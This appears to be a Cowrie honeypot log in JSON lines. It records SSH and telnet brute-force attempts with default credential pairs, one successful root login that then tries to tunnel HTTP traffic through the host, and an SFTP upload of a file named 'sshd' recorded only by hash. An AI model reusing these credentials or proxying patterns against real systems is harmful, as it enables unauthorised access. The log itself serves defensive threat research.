{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:09:11.427150Z","src_ip":"102.210.148.92","session":"4a3deb2a1e2e"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"moodle.123","message":"login attempt [moodle/moodle.123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:09:12.115849Z","src_ip":"102.210.148.92","session":"4a3deb2a1e2e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:13.278938Z","src_ip":"102.210.148.92","session":"4a3deb2a1e2e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:17.585894Z","src_ip":"212.227.125.160","session":"060e9e5d2673"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49060,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff4f45c8b48d","protocol":"ssh","message":"New connection: 212.227.125.160:49060 (1.2.3.4:22) [session: ff4f45c8b48d]","sensor":"my-vps","timestamp":"2025-08-31T07:09:18.657037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:09:19.194706Z","src_ip":"212.227.125.160","session":"ff4f45c8b48d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:09:19.195726Z","src_ip":"212.227.125.160","session":"ff4f45c8b48d"}
{"eventid":"cowrie.login.failed","username":"www","password":"letmein","message":"login attempt [www/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T07:09:21.195365Z","src_ip":"212.227.125.160","session":"ff4f45c8b48d"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:22.803060Z","src_ip":"212.227.125.160","session":"ff4f45c8b48d"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/083d198eb2d8464c4e29d30a04ee8f002a23d4705b5393e5200c0b8e6b26031b","shasum":"083d198eb2d8464c4e29d30a04ee8f002a23d4705b5393e5200c0b8e6b26031b","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/083d198eb2d8464c4e29d30a04ee8f002a23d4705b5393e5200c0b8e6b26031b","sensor":"my-vps","timestamp":"2025-08-31T07:09:33.989416Z","src_ip":"212.227.235.229","session":"22773f8f5f21"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:33.990159Z","src_ip":"212.227.235.229","session":"22773f8f5f21"}
{"eventid":"cowrie.session.closed","duration":"194.0","message":"Connection lost after 194.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:09:54.449744Z","src_ip":"212.227.125.160","session":"ea0fba322ac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37546,"dst_ip":"1.2.3.4","dst_port":22,"session":"423b0d9f50ca","protocol":"ssh","message":"New connection: 212.227.235.229:37546 (1.2.3.4:22) [session: 423b0d9f50ca]","sensor":"my-vps","timestamp":"2025-08-31T07:09:56.530734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:09:57.229137Z","src_ip":"212.227.235.229","session":"423b0d9f50ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:09:57.229821Z","src_ip":"212.227.235.229","session":"423b0d9f50ca"}
{"eventid":"cowrie.login.failed","username":"www","password":"welcome","message":"login attempt [www/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T07:10:03.168932Z","src_ip":"212.227.235.229","session":"423b0d9f50ca"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:04.974886Z","src_ip":"212.227.235.229","session":"423b0d9f50ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55992,"dst_ip":"1.2.3.4","dst_port":22,"session":"6150124c2bc1","protocol":"ssh","message":"New connection: 212.227.125.160:55992 (1.2.3.4:22) [session: 6150124c2bc1]","sensor":"my-vps","timestamp":"2025-08-31T07:10:18.231980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:10:18.665082Z","src_ip":"212.227.125.160","session":"6150124c2bc1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:10:18.683964Z","src_ip":"212.227.125.160","session":"6150124c2bc1"}
{"eventid":"cowrie.login.failed","username":"www","password":"welcome","message":"login attempt [www/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T07:10:20.853136Z","src_ip":"212.227.125.160","session":"6150124c2bc1"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:22.668952Z","src_ip":"212.227.125.160","session":"6150124c2bc1"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":36196,"dst_ip":"1.2.3.4","dst_port":22,"session":"942c4b0201e8","protocol":"ssh","message":"New connection: 102.210.148.92:36196 (1.2.3.4:22) [session: 942c4b0201e8]","sensor":"my-vps","timestamp":"2025-08-31T07:10:28.913897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:10:28.914840Z","src_ip":"102.210.148.92","session":"942c4b0201e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:10:29.090806Z","src_ip":"102.210.148.92","session":"942c4b0201e8"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456@ABC","message":"login attempt [postgres/123456@ABC] failed","sensor":"my-vps","timestamp":"2025-08-31T07:10:29.832300Z","src_ip":"102.210.148.92","session":"942c4b0201e8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:31.010652Z","src_ip":"102.210.148.92","session":"942c4b0201e8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14989,"dst_ip":"1.2.3.4","dst_port":22,"session":"023c664cbf09","protocol":"ssh","message":"New connection: 77.83.207.83:14989 (1.2.3.4:22) [session: 023c664cbf09]","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.077948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.078967Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.128878Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.378492Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18746,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18746","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.429682Z","session":"023c664cbf09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.481333Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":12684,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12684","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.624309Z","session":"023c664cbf09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.674460Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":5427,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5427","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.816291Z","session":"023c664cbf09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.866343Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:34.917325Z","src_ip":"77.83.207.83","session":"023c664cbf09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34678,"dst_ip":"1.2.3.4","dst_port":23,"session":"84e1a5fc0d77","protocol":"telnet","message":"New connection: 212.227.235.229:34678 (1.2.3.4:23) [session: 84e1a5fc0d77]","sensor":"my-vps","timestamp":"2025-08-31T07:10:44.407012Z"}
{"eventid":"cowrie.session.closed","duration":0.20621371269226074,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:44.613159Z","src_ip":"212.227.235.229","session":"84e1a5fc0d77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34696,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2429f514fec","protocol":"telnet","message":"New connection: 212.227.235.229:34696 (1.2.3.4:23) [session: c2429f514fec]","sensor":"my-vps","timestamp":"2025-08-31T07:10:44.983307Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-31T07:10:44.984506Z","src_ip":"212.227.235.229","session":"c2429f514fec"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T07:10:44.985420Z","src_ip":"212.227.235.229","session":"c2429f514fec"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:10:44.986467Z","src_ip":"212.227.235.229","session":"c2429f514fec"}
{"eventid":"cowrie.session.closed","duration":0.19970440864562988,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:45.182935Z","src_ip":"212.227.235.229","session":"c2429f514fec"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54762,"dst_ip":"1.2.3.4","dst_port":22,"session":"45dd16d5d58a","protocol":"ssh","message":"New connection: 217.72.205.35:54762 (1.2.3.4:22) [session: 45dd16d5d58a]","sensor":"my-vps","timestamp":"2025-08-31T07:10:57.149250Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:57.151081Z","src_ip":"217.72.205.35","session":"45dd16d5d58a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44272,"dst_ip":"1.2.3.4","dst_port":22,"session":"5142500d37e5","protocol":"ssh","message":"New connection: 212.227.235.229:44272 (1.2.3.4:22) [session: 5142500d37e5]","sensor":"my-vps","timestamp":"2025-08-31T07:10:57.434583Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46678,"dst_ip":"1.2.3.4","dst_port":23,"session":"162b1d5120b2","protocol":"telnet","message":"New connection: 212.227.125.160:46678 (1.2.3.4:23) [session: 162b1d5120b2]","sensor":"my-vps","timestamp":"2025-08-31T07:10:57.949425Z"}
{"eventid":"cowrie.session.closed","duration":0.16110825538635254,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:10:58.110466Z","src_ip":"212.227.125.160","session":"162b1d5120b2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:10:58.213328Z","src_ip":"212.227.235.229","session":"5142500d37e5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:10:58.214090Z","src_ip":"212.227.235.229","session":"5142500d37e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46680,"dst_ip":"1.2.3.4","dst_port":23,"session":"61460c25bf06","protocol":"telnet","message":"New connection: 212.227.125.160:46680 (1.2.3.4:23) [session: 61460c25bf06]","sensor":"my-vps","timestamp":"2025-08-31T07:11:01.640277Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-31T07:11:01.643378Z","src_ip":"212.227.125.160","session":"61460c25bf06"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T07:11:01.644333Z","src_ip":"212.227.125.160","session":"61460c25bf06"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:11:01.645266Z","src_ip":"212.227.125.160","session":"61460c25bf06"}
{"eventid":"cowrie.session.closed","duration":0.14891719818115234,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:11:01.789085Z","src_ip":"212.227.125.160","session":"61460c25bf06"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:11:03.970712Z","src_ip":"212.227.235.229","session":"5142500d37e5"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:11:05.924840Z","src_ip":"212.227.235.229","session":"5142500d37e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33728,"dst_ip":"1.2.3.4","dst_port":22,"session":"d785b5b55015","protocol":"ssh","message":"New connection: 212.227.125.160:33728 (1.2.3.4:22) [session: d785b5b55015]","sensor":"my-vps","timestamp":"2025-08-31T07:11:18.809756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:11:19.463851Z","src_ip":"212.227.125.160","session":"d785b5b55015"}
